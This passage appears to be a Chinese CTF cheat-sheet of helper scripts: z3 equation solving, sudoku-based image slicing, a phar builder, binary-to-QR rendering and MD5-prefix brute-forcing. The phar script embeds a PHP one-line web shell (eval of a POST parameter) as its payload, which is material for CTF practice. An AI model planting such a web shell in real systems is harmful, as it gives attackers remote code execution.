s.add(140*v0+697*v1+281*v2+687*v3+34*v4+657*v5+678*v6+420*v7+697*v8+632*v9+660*v10+464*v11+797*v12+60*v13+655*v14+347*v15+496*v16+796*v17+532*v18+55*v19+450*v20+961*v21+44*v22+769*v23+622*v24+527*v25+756*v26+843*v27+878*v28+844*v29+767*v30+478*v31+612*v32+132*v33+804*v34==9953220)
s.add(67*v0+776*v1+816*v2+372*v3+553*v4+169*v5+596*v6+85*v7+991*v8+97*v9+931*v10+735*v11+960*v12+336*v13+482*v14+243*v15+512*v16+910*v17+722*v18+276*v19+381*v20+495*v21+349*v22+121*v23+366*v24+693*v25+496*v26+727*v27+615*v28+42*v29+974*v30+876*v31+698*v32+816*v33+414*v34==10782865)
s.add(529*v0+755*v1+674*v2+262*v3+667*v4+119*v5+855*v6+1003*v7+912*v8+414*v9+1012*v10+122*v11+592*v12+443*v13+829*v14+169*v15+556*v16+17*v17+476*v18+954*v19+751*v20+203*v21+39*v22+667*v23+413*v24+744*v25+66*v26+120*v27+322*v28+895*v29+389*v30+573*v31+499*v32+377*v33+351*v34==9924122)
s.add(727*v0+717*v1+559*v2+922*v3+527*v4+512*v5+1000*v6+333*v7+790*v8+901*v9+42*v10+420*v11+585*v12+408*v13+988*v14+94*v15+945*v16+331*v17+704*v18+651*v19+130*v20+796*v21+795*v22+322*v23+88*v24+776*v25+299*v26+972*v27+616*v28+909*v29+820*v30+617*v31+439*v32+721*v33+176*v34==10760304)
s.add(434*v0+861*v1+873*v2+935*v3+582*v4+543*v5+33*v6+741*v7+897*v8+208*v9+571*v10+294*v11+868*v12+302*v13+362*v14+885*v15+318*v16+39*v17+274*v18+833*v19+573*v20+732*v21+526*v22+542*v23+312*v24+454*v25+187*v26+15*v27+616*v28+45*v29+243*v30+732*v31+841*v32+439*v33+80*v34==9838513)
s.add(843*v0+931*v1+854*v2+1*v3+564*v4+889*v5+799*v6+655*v7+610*v8+196*v9+227*v10+456*v11+325*v12+270*v13+99*v14+513*v15+372*v16+664*v17+765*v18+817*v19+328*v20+820*v21+810*v22+305*v23+731*v24+683*v25+85*v26+409*v27+456*v28+134*v29+836*v30+342*v31+385*v32+196*v33+760*v34==10335141)
s.add(711*v0+59*v1+806*v2+683*v3+462*v4+270*v5+832*v6+257*v7+531*v8+990*v9+605*v10+436*v11+620*v12+928*v13+880*v14+987*v15+354*v16+815*v17+679*v18+483*v19+135*v20+949*v21+756*v22+66*v23+315*v24+718*v25+799*v26+269*v27+960*v28+193*v29+547*v30+780*v31+767*v32+1010*v33+762*v34==11888742)

print(s.check())
print(s.model())


解数独后进行拼图

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from PIL import Image

name_list = [[11, 27, 32, 44, 58, 63, 76, 85, 99],
[13, 25, 38, 49, 56, 61, 77, 82, 94],
[14, 29, 36, 47, 52, 65, 71, 88, 93],
[12, 24, 37, 48, 51, 69, 75, 83, 96],
[19, 23, 35, 46, 57, 64, 72, 81, 98],
[18, 26, 31, 45, 53, 62, 79, 84, 97],
[17, 22, 34, 43, 55, 66, 78, 89, 91],
[16, 21, 39, 42, 54, 68, 73, 87, 95],
[15, 28, 33, 41, 59, 67, 74, 86, 92]]

img = Image.open("./image/image.png") # 读取要操作的图片

width, height = img.size # 获取图片的宽度和高度

crop_width = width // 9 # 截切后图片的宽度
crop_height = height // 9 # 截切后图片的高度

# 利用循环将原图片截成 9*9 个图片,并保存
for i in range(9):
for j in range(9):
box = (crop_width * j, crop_height * i, crop_width * (j + 1), crop_height * (i + 1)) # 截切下来的图片在原图片的位置 (left,up,right,down)
new_img = img.crop(box)
name = "./image/" + str(name_list[i][j]) + ".png"
new_img.save(name)

生成phar文件的php脚本

1
2
3
4
5
6
7
8
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub;
//$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.php", "<?php eval(\$_POST[123]); ?>"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

二进制转二维码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import PIL
from PIL import Image
MAX = 187
img = Image.new("RGB",(MAX,MAX))
str = "01字符串"
i = 0
for y in range (0,MAX):
for x in range (0,MAX):
if(str[i] == '1'):
img.putpixel([x,y],(0, 0, 0))
else:
img.putpixel([x,y],(255,255,255))
i = i+1
img.show()
img.save("flag.png")

MD5截断比较爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from multiprocessing.dummy import Pool as tp
import hashlib
knownMd5 = '9ccde'
def md5(text):
return hashlib.md5(str(text).encode('utf-8')).hexdigest()
def findCode(code):
key = code.split(':')
start = int(key[0])
end = int(key[1])
for code in range(start, end):
if md5(code)[0:5] == knownMd5:
print code
break
list=[]
for i in range(3):
list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = tp()
pool.map(findCode, list)
pool.close()
pool.join()